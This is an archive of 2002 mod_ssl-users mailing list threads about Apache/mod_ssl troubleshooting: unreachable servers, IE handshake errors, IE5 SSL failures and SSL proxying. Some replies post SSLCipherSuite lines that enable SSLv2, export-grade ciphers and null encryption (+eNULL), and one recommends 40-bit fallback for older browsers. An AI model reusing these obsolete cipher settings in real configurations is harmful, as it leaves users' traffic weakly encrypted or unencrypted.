X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Earl" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

My regular server stuff runs fine. I think it has something to do with the
ipchains as other people have mentioned. I am looking into it now. Thanks
everyone!


----- Original Message -----
From: "DG Speekenbrink" 
To: 
Sent: Friday, May 17, 2002 12:16 AM
Subject: Re: Runs on local...but can't see it anywhere else


> Hi,
>
> This sounds more like a general Apache config problem.
> is it possible to request pages with the regular http:// request?
>
> If not, some settings in your httpd.conf are the problem.
>
> Good luck,
>
> Dennis
>
> Alex Earl wrote:
> >
> > Hi!
> >
> > First off I would like to thank you for your help and knowledge! I enjoy
> > this forum a lot!
> >
> > I have set up mod_ssl with Apache 1.3 and everything seems to run just
fine
> > on the local machine. I can curl https://localhost (and the actual
server
> > address) and get the right stuff...but when I try to access it from
anywhere
> > else I get a server not found error. Any ideas?!
> >
> > Thanks!
> >
> > Alex Earl
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 17:06:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA04280; Fri, 17 May 2002 17:05:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA04196; Fri, 17 May 2002 17:04:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5C30A4CE739; Fri, 17 May 2002 17:04:05 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4HEwSg73732; Fri, 17 May 2002 16:58:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fortress.internal.net id QAA00517; Fri, 17 May 2002 16:01:35 +0200 (MET DST)
Received: by fortress.internal.net (Postfix, from userid 66)
	id AC0BE6720B; Fri, 17 May 2002 16:01:34 +0200 (CEST)
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Date: Fri, 17 May 2002 16:04:05 +0200
From: Heribert Steuer 
Message-ID: <3CE50DD5.36FF65FD@stockmanagement.de>
MIME-Version: 1.0
Received: from stockmanagement.de (storage.freiburg.peh [192.168.30.6])
	by fortress.internal.net (AvMailGate-6.11.0.2) id 19937-560C7274;
	Fri, 17 May 2002 16:01:11 +0200
Subject: RE: handshake problem with IE
To: modssl-users@modssl.org
X-Accept-Language: en
X-AntiVirus: OK! AvMailGate Version 6.11.0.5
	 at fortress has not found any known virus in this email.
X-Mailer: Mozilla 4.79 [en] (X11; U; OpenBSD 3.0 i386)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Heribert Steuer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear B. Courtin,

all the webservers run in local networks and dont pass any other
machines (like proxies or load balancers).
the logs show the correct IP of the clients.
when running non-ssl connections the error doesnt occur at all (same
machine, same pages, same client).
I also never discovered this problem using NS4.x
So im quite sure its a IE problem. Its known that IE is quite crappy
with https, but there must be a way to solve this.
Keepalive is turned off for the whole server. So that cannot be the
problem.
For completeness i attached the virtualhost config section of the
httpd.conf
Any other ideas ?

Regards,
Heribert Steuer


--SNIP!--


  ServerName    oms.freiburg.peh  # resolved by internal dns

  SSLEngine on
  SSLCertificateFile conf/ssl.crt/server.crt
  SSLCertificateKeyFile conf/ssl.key/server.key
  
        SSLOptions +StdEnvVars
  



  DocumentRoot  /webroot/peh.internal.net/htdocs
  ServerAdmin   steuer@stockmanagement.de
  ScriptAlias   /cgi-bin/ /webroot/peh.internal.net/cgi-bin/
  ScriptAlias   /perl-bin/ /webroot/peh.internal.net/perl-bin/
  LogFormat "%V %h %l %u %t \"%r\" %s %b" vcommon
  CustomLog /webroot/peh.internal.net/logs/access_log vcommon
  ErrorLog  /webroot/peh.internal.net/logs/error_log

  SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
  
    Options FollowSymLinks
    AllowOverride All
    SetEnvIf User-Agent ".*MSIE.*" \
             nokeepalive ssl-unclean-shutdown \
             downgrade-1.0 force-response-1.0

  
  
    SetHandler perl-script
    PerlHandler Apache::Registry
    PerlSendHeader On
    Options ExecCGI
  


  # Unauthorized
  ErrorDocument 401 /error_html/401.html
  # Payment Required
  ErrorDocument 402 /error_html/402.html
  # Forbidden
  ErrorDocument 403 /error_html/403.html
  # Not Found
  ErrorDocument 404 /error_html/404.html
  # Internal Server Error
  ErrorDocument 500 /error_html/500.html







--SNIP!--



----Original Message----

Hi Heribert,

         are you sure these errors are caused by access/commmunication
with the Microsoft
         Internet Explorer 6.0.2600.000? Do they only occour when the
webserver is accessed by
         a browser (i.e. MS IE6) or on a regulary basis: are you sure
your web-servers are not
         behind any kind of load balancer which is sending "pings" or
"keepalive" requests to
         your webserver?

         Kind regards,
         B. Courtin



         -----Original Message-----
         From: Heribert Steuer [mailto:steuer@stockmanagement.de]
         Sent: Thursday, May 16, 2002 7:12 PM
         To: modssl-users@modssl.org
         Subject: handshake problem with IE


         Hello everybody,

         i was already reading the posts on this issue, but all
suggested tips
         didnt help at all.
         server is apache (see version numbers below) running on OpenBSD

         3.0stable
         client is Microsoft Internet Explorer 6.0.2600.000 with 128bit
         encryption


         the logs say the following  (at least they are full of it):

         [Thu May 16 18:52:12 2002] [error] mod_ssl: SSL handshake
interrupted by
         system [Hint: Stop button pressed in browser?!] (System error
follows)
         [Thu May 16 18:52:12 2002] [error] System: Connection reset by
peer
         (errno: 54)


         ssl_engine_log is :

         [16/May/2002 18:52:13 06053] [info]  Connection to child 0
established
         (server cyrus.freiburg.peh:443, client 192.168.30.30)
         [16/May/2002 18:52:13 06053] [info]  Seeding PRNG with 1160
bytes of
         entropy
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Handshake: start
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop:
before/accept
         initialization
         [16/May/2002 18:52:13 06053] [debug] OpenSSL: read 11/11 bytes
from
         BIO#00A259C0 [mem: 00CCE000] (BIO dump follows)
         [...]
         [16/May/2002 18:52:13 06053] [debug] OpenSSL: read 67/67 bytes
from
         BIO#00A259C0 [mem: 00CCE00B] (BIO dump follows)
         [...]
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 read
client
         hello A
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write
server
         hello A
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write

         certificate A
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write
server
         done A
         [16/May/2002 18:52:13 06053] [debug] OpenSSL: write 762/762
bytes to
         BIO#00A259C0 [mem: 00CA3000] (BIO dump follows)
         [...]
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 flush
data
         [16/May/2002 18:52:13 06053] [debug] OpenSSL: I/O error, 5
bytes
         expected to read on BIO#00A259C0 [mem: 00CCE000]
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in
SSLv3 read
         client certificate A
         [16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in
SSLv3 read
         client certificate A
         [16/May/2002 18:52:13 06053] [error] SSL handshake interrupted
by system
         [Hint: Stop button pressed in browser?!] (System error follows)

         [16/May/2002 18:52:13 06053] [error] System: Connection reset
by peer
         (errno: 54)



         OpenSSL 0.9.6b [engine] 9 Jul 2001
         mod_ssl version 2.8
         mod_perl-1.26

         Server version: Apache/1.3.19 (Unix)
         Server built:   Oct 15 2001 11:48:41
         Server's Module Magic Number: 19990320:10
         Server compiled with....
          -D EAPI
          -D HAVE_MMAP
          -D HAVE_SHMGET
          -D USE_MMAP_SCOREBOARD
          -D USE_MMAP_FILES
          -D USE_FLOCK_SERIALIZED_ACCEPT
          -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
          -D HTTPD_ROOT="/var/www"
          -D SUEXEC_BIN="/usr/sbin/suexec"
          -D DEFAULT_PIDLOG="logs/httpd.pid"
          -D DEFAULT_SCOREBOARD="logs/httpd.scoreboard"
          -D DEFAULT_LOCKFILE="logs/httpd.lock"
          -D DEFAULT_XFERLOG="logs/access_log"
          -D DEFAULT_ERRORLOG="logs/error_log"
          -D TYPES_CONFIG_FILE="conf/mime.types"
          -D SERVER_CONFIG_FILE="conf/httpd.conf"
          -D ACCESS_CONFIG_FILE="conf/access.conf"
          -D RESOURCE_CONFIG_FILE="conf/srm.conf"


         if theres a need for more details, just let me know. this
problem occurs
         on 3 different machines
         (all running OpenBSD with different versions of apache/mod_ssl)

         i hope someone can help.


         thanks in advance

         Heribert Steuer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 17:19:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05586; Fri, 17 May 2002 17:18:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id RAA05539; Fri, 17 May 2002 17:17:33 +0200 (MET DST)
Received: from kursa ([62.189.189.145])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id QAA30337
	for ; Fri, 17 May 2002 16:17:31 +0100
From: "Jeff" 
To: 
Subject: RE: IE 5.00 - 5.01 SSL Connection Failures
Date: Fri, 17 May 2002 16:16:22 +0100
Message-ID: <004101c1fdb5$e30184c0$3264a8c0@kursa>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: <20020517141653.1EAC.LOUIS@webtedium.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> In addition, a large proportion of our customers have little or no
> previous IT experience and cannot be expected to apply patches no
matter
> how trivial it may seem to us!

We had some top-notch technical people spend more than three months,
setting up an isolated web/client environment to duplicate customers
configurations in order to track down, isolate and see if there was a
fix for this intermittent problem. 

We tested a vast range of both client and server configurations,
(including win9x/ME/NT clients to see if there were OS specific DLLs
causing the issues), to see if there were any combinations that might
improve the situation - as I mentioned, you can improve it by fiddling
with the client caching settings - but this is actually harder for
clients to do than upgrading IE using a free CD. It also requires that
you carefully craft your server cache directives for MSIE 5.00 clients. 

After three months of investigation, testing and email exchanges with MS
support, we concluded that there was no practical solution. We will take
our hats off for you if you can find one. We believe that MSIE 5.00/SSL
goes into the same bucket as the yeti - no-one's ever seen a real
commercial version of the beastie, and we aint gonna $pend more time
hunting it. 

The Bad Thing that will happen, is that your site will appear flaky to
your customers. If you can live with that, good and well - otherwise,
consider not using SSL for some bits [not an option for us]. 

You can also minimise the issues with some site redesign - make sure
there is only ONE thing per request - no images, external JavaScript or
external style-sheets etc, then at least the failure is total, rather
than indeterminate, and users can get away with pressing refresh. We
operate commercial sites on an ASP basis with high user expectations, so
this wasn't an option for us.

IHMO 33% of your market isn't really buying stuff reliably elsewhere
using SSL and MSIE 5.00


On the 5.01 problems I can offer more hope - we have lots of clients
happily using 5.01 with certs and SSL, through proxies and firewalls
without issues - this one is grokkable. Apart from the early SSL
keepalive, we have had no issues with 5.01.

Regards
Jeff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 17:22:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05820; Fri, 17 May 2002 17:21:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id RAA05779; Fri, 17 May 2002 17:20:59 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GW9HAW00.EAS for ; Fri, 17 May 2002
          16:20:57 +0100 
Message-ID: <3CE51FD9.9030503@itaction.co.uk>
Date: Fri, 17 May 2002 16:20:57 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: IE 5.00 - 5.01 SSL Connection Failures
References: <20020517132027.1EA7.LOUIS@webtedium.com> <003f01c1fda1$9d053250$3264a8c0@kursa> <20020517141653.1EAC.LOUIS@webtedium.com>
Content-Type: multipart/alternative;
 boundary="------------060505080503080601000806"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------060505080503080601000806
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

  Let me guess.... you have a  '128 bit' SGC certificate on  your
server? If you do then change your cipher  suite to not offer EXPORT56
 for example:

SSLCipherSuite
!EXPORT56:ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

This  results in  most  people with  older clients  using 40 bit
encryption, and people who care about security and upgrade their
software get 128bit SSL3 or TLS..

You should alter your logs to log the resultant SSL cipher type and
length so you can get some info on which clients give you problems - and
you could put some warning notes about the browser types on the site
somewhere to cover your butts.


Louis Sabet wrote:

>On Fri, 17 May 2002 13:51:15 +0100
>"Jeff"  wrote:
>
>
>
>>MS IE 5.00 was a flawed release, that MS very quickly (4 weeks) replaced
>>with 5.01, mainly for security reasons. You should be able to get any
>>reasonable users (corporate or otherwise) to upgrade asap. MSIE 5.00 has
>>some serious bugs when using SSL and cacheing, so you may be able to
>>tweak all your users caching settings, and also to look at making your
>>pages non-cacheable. I have to say though that in our experience with a
>>group of 10 users of 5.00 it was far easier to get them to switch to
>>Netscape until their 5.01 (in fact they went for 5.5) to arrive.
>>
>>
>
>Unfortunately in this sector of retail, our target audience is very
>fickle, and an abundance of similar online retailers in recent years
>have made this an extremely competitive market. We cannot afford to
>aggravate any customers at this point.
>
>In addition, a large proportion of our customers have little or no
>previous IT experience and cannot be expected to apply patches no matter
>how trivial it may seem to us!
>
>***SNIP***
>
>
>
>>The problems you describe with 5.01, I have seen when SSL keepalive
>>settings were enabled on the web-server. The SSLKeepAlive settings were
>>invented to speed up a clients access to your site, so that as
>>subsequent requests for images, css, etc etc were made, the SSL
>>negotiation overhead was short-circuited. Unfortunately the MS 5.xx
>>browsers never quite got it right. We use Apache, and this is the
>>setting in httpd.conf
>>  SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
>>downgrade-1.0 force-response-1.0
>>
>>
>
>I checked our httpd.conf, and indeed we have the same line in all our
>SSL sites. So this particular problem must lie elsewhere.
>
>I'll agree with peoples' comments on IE5 being terrible, but
>unfortunately as an online retailer we have no choice as to what our
>customers access our website with, and a disturbing number of customers
>(33%) happen to be using IE5.00 to 5.01.
>
>If anyone else has any comments, they would be very much appreciated at
>this point!
>
>
>
>>You can check your SSL logs to see if the keepalive settings are active
>>- it they are you will see an incrementing number associated with each
>>request from the same user that indicates the SSL negotiation was
>>short-cut, and that previously negotiated keys are being used.
>>
>>'nokeepalive' is fractionally slower, but at least your users will not
>>get the regular 'page cannot be found' issue.
>>
>>As to sharing Client Certs between IE and NS - we do this happily for NS
>>4.0-4.75 and MSIE 5.01-6.0 without any issues.
>>
>>
>>Regards
>>Jeff
>>
>>
>>
>>
>>-----Original Message-----
>>From: owner-modssl-users@modssl.org
>>[mailto:owner-modssl-users@modssl.org] On Behalf Of Louis Sabet
>>Sent: 17 May 2002 13:29
>>To: modssl-users@modssl.org
>>Subject: IE 5.00 - 5.01 SSL Connection Failures
>>
>>
>>Hi List,
>>
>>I work for a mobile phone retail company in the UK - www.mobiles.co.uk
>>
>>Recently we discovered that several of our customers were unable to
>>complete the secure portions of their orders. The only common factor
>>with all these problems were that all customers were using IE 5.00 to IE
>>5.01.
>>
>>Under Internet Explorer they receive "Page Connot Be Found". With
>>Netscape all works fine, and with all other recent Internet Explorer
>>versions, a successful connection can be made.
>>
>>I found nothing useful on the Microsoft site other than this:
>>http://support.microsoft.com/default.aspx?scid=kb;EN-US;q244302
>>
>>It may be the root of the problem, but we cannot ask the 33% of our
>>customers who use IE5 to patch their machines before accessing our site.
>>
>>It is obvious that MOST connections to https sites can be made from IE5,
>>or it would have been better documented.
>>
>>I contacted Verisign to find out if there was a reason some certificates
>>were useable with IE5, and others weren't, but I found their technical
>>support to be quite useless.
>>
>>My last option is to ask you guys whether this could be a configuration
>>issue - or whether there is some configuration tweak I can make to get
>>around this problem for our IE5 users.
>>
>>Best regards,
>>
>>Louis
>>
>>--
>>Louis Sabet 
>>http://www.webtedium.com/
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
>
>--
>Louis Sabet 
>http://www.webtedium.com/
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>


--------------060505080503080601000806
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  




          Let me guess.... you have a  '128 bit' SGC certificate on  your
server? If you do then change your cipher  suite to not offer EXPORT56  for
example:

 

 SSLCipherSuite !EXPORT56:ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

 

This  results in  most  people with  older clients  using 40 bit encryption,
and people who care about security and upgrade their software get 128bit
SSL3 or TLS..

 

 You should alter your logs to log the resultant SSL cipher type and length
so you can get some info on which clients give you problems - and you could
put some warning notes about the browser types on the site somewhere to cover
your butts.



 

 Louis Sabet wrote:




  
On Fri, 17 May 2002 13:51:15 +0100
"Jeff" <jaa.modssl@aquabolt.com> wrote:

  


  

    
MS IE 5.00 was a flawed release, that MS very quickly (4 weeks) replaced
with 5.01, mainly for security reasons. You should be able to get any
reasonable users (corporate or otherwise) to upgrade asap. MSIE 5.00 has
some serious bugs when using SSL and cacheing, so you may be able to
tweak all your users caching settings, and also to look at making your
pages non-cacheable. I have to say though that in our experience with a
group of 10 users of 5.00 it was far easier to get them to switch to
Netscape until their 5.01 (in fact they went for 5.5) to arrive.
    

   


  

Unfortunately in this sector of retail, our target audience is very
fickle, and an abundance of similar online retailers in recent years
have made this an extremely competitive market. We cannot afford to
aggravate any customers at this point.

In addition, a large proportion of our customers have little or no
previous IT experience and cannot be expected to apply patches no matter
how trivial it may seem to us!

***SNIP***

  


  

    
The problems you describe with 5.01, I have seen when SSL keepalive
settings were enabled on the web-server. The SSLKeepAlive settings were
invented to speed up a clients access to your site, so that as
subsequent requests for images, css, etc etc were made, the SSL
negotiation overhead was short-circuited. Unfortunately the MS 5.xx
browsers never quite got it right. We use Apache, and this is the
setting in httpd.conf
  SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
downgrade-1.0 force-response-1.0
    

   


  

I checked our httpd.conf, and indeed we have the same line in all our
SSL sites. So this particular problem must lie elsewhere.

I'll agree with peoples' comments on IE5 being terrible, but
unfortunately as an online retailer we have no choice as to what our
customers access our website with, and a disturbing number of customers
(33%) happen to be using IE5.00 to 5.01.

If anyone else has any comments, they would be very much appreciated at
this point!

  


  

    
You can check your SSL logs to see if the keepalive settings are active
- it they are you will see an incrementing number associated with each
request from the same user that indicates the SSL negotiation was
short-cut, and that previously negotiated keys are being used.

'nokeepalive' is fractionally slower, but at least your users will not
get the regular 'page cannot be found' issue.

As to sharing Client Certs between IE and NS - we do this happily for NS
4.0-4.75 and MSIE 5.01-6.0 without any issues.


Regards
Jeff




-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Louis Sabet
Sent: 17 May 2002 13:29
To: modssl-users@modssl.org
Subject: IE 5.00 - 5.01 SSL Connection Failures


Hi List,

I work for a mobile phone retail company in the UK - www.mobiles.co.uk

Recently we discovered that several of our customers were unable to
complete the secure portions of their orders. The only common factor
with all these problems were that all customers were using IE 5.00 to IE
5.01.

Under Internet Explorer they receive "Page Connot Be Found". With
Netscape all works fine, and with all other recent Internet Explorer
versions, a successful connection can be made.

I found nothing useful on the Microsoft site other than this:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;q244302

It may be the root of the problem, but we cannot ask the 33% of our
customers who use IE5 to patch their machines before accessing our site.

It is obvious that MOST connections to https sites can be made from IE5,
or it would have been better documented.

I contacted Verisign to find out if there was a reason some certificates
were useable with IE5, and others weren't, but I found their technical
support to be quite useless.

My last option is to ask you guys whether this could be a configuration
issue - or whether there is some configuration tweak I can make to get
around this problem for our IE5 users.

Best regards,

Louis

--
Louis Sabet <louis@webtedium.com>
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
    

   


  

--
Louis Sabet <louis@webtedium.com>
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
  

 

 





--------------060505080503080601000806--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 17:45:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07417; Fri, 17 May 2002 17:44:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sneezy.usu.edu id RAA07312; Fri, 17 May 2002 17:43:25 +0200 (MET DST)
Received: from RM426 ("port 3841"@rm426.cs.usu.edu [129.123.109.181])
 by cc.usu.edu (PMDF V5.2-32 #39089)
 with SMTP id <01KHTVWOKS4K9399W1@cc.usu.edu> for modssl-users@modssl.org; Fri,
 17 May 2002 09:43:17 MDT
Date: Fri, 17 May 2002 09:40:18 -0600
From: Alex Earl 
Subject: Runs on local...but can't see it anywhere else...STILL
To: modssl-users@modssl.org
Message-id: <001101c1fdb9$258e1490$b56d7b81@RM426>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Content-type: text/plain;	charset="iso-8859-1"
Content-transfer-encoding: 7bit
X-Priority: 3
X-MSMail-priority: Normal
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Earl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I went in and changed the ipchains to allow https, but it still will not
connect from a remote location. Someone mentioned setting up DNS for my
domain. I was wondering what you meant. Again, I appreciate all your help
for a new guy!

Alex Earl

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 17:52:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07967; Fri, 17 May 2002 17:51:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id RAA07934; Fri, 17 May 2002 17:50:26 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA29383
	for ; Fri, 17 May 2002 11:51:20 -0400
Date: Fri, 17 May 2002 11:51:20 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Runs on local...but can't see it anywhere else...STILL
In-Reply-To: <001101c1fdb9$258e1490$b56d7b81@RM426>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



first, have you registered a domain?  does this server have a static IP
address that reflects to this domain?  Or is this a machine on the campus
backbone or student residential systems under the edu domain you are
posting from?

Thanks,

Ron Dufresne

On Fri, 17 May 2002, Alex Earl wrote:

> I went in and changed the ipchains to allow https, but it still will not
> connect from a remote location. Someone mentioned setting up DNS for my
> domain. I was wondering what you meant. Again, I appreciate all your help
> for a new guy!
> 
> Alex Earl
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 19:29:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15560; Fri, 17 May 2002 19:28:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ssmail.ct.smartserv.com id TAA15533; Fri, 17 May 2002 19:27:45 +0200 (MET DST)
Received: by ssmail.ct.smartserv.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 17 May 2002 13:28:18 -0400
Message-ID: 
From: "Petryczka, George" 
To: "'modssl-users@modssl.org'" 
Subject: ssl proxy
Date: Fri, 17 May 2002 13:28:14 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Petryczka, George" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,
Can a httpd be set up as a "secure proxy"?  Ie.: forward requests from a
client  (a client that doesn't get involved with any ssl stuff itself)  on
to an HTTPS site?

-george


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 19:51:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16846; Fri, 17 May 2002 19:50:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id TAA16799; Fri, 17 May 2002 19:49:33 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4HHmSq28400
	for ; Fri, 17 May 2002 13:48:28 -0400
Date: Fri, 17 May 2002 13:48:28 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: "'modssl-users@modssl.org'" 
Subject: Re: ssl proxy
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 17 May 2002, Petryczka, George wrote:

> Can a httpd be set up as a "secure proxy"?  Ie.: forward requests from a
> client  (a client that doesn't get involved with any ssl stuff itself)  on
> to an HTTPS site?

Yes.  With Apache 1.3 / mod_ssl 2.8.x, you _might_ have to enable
SSL_EXPERIMENTAL or something like that, I'm not sure.  But it can be
done.

--Cliff

______________________________________________________________________
